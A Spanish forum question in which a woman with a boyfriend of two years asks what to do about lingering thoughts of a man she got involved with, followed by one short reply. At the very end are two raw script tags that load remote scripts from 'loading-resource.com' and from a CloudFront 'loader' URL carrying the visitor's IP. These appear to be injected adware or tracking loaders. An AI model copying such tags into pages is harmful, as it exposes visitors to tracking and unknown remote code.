Tengo novio, pero también me gusta otro. ¿Qué hago?

Hola! Veras, tengo novio desde hace dos años pero hace uno me enrolle con uno, el me perdono pero no he vuelto a saber nada del otro porque dejé de hablar con el. Pero desde hace un tiempo aparece en mis sueños y luego hay veces que no puedo quitármelo de la cabeza por ello. Pero ahora que se lo he contado a mi pareja estamos mal y yo confundida. ¿Que hago?

1 Respuesta

Respuesta

Si te has liado con otro estando con tu novio, por algo sería, y si te viene continuamente a la cabeza... Ahora estás dudando entre tu relación seria y la atracción sexual que tendrás con el otro chico, solo tu puedes decidir..

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BC2F60FC6-789E-4B66-B7EE-CE7F2B7B84D2%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=M%EF%BF%BDstoles&ip=95.122.7.199,%2010.211.122.63"></script>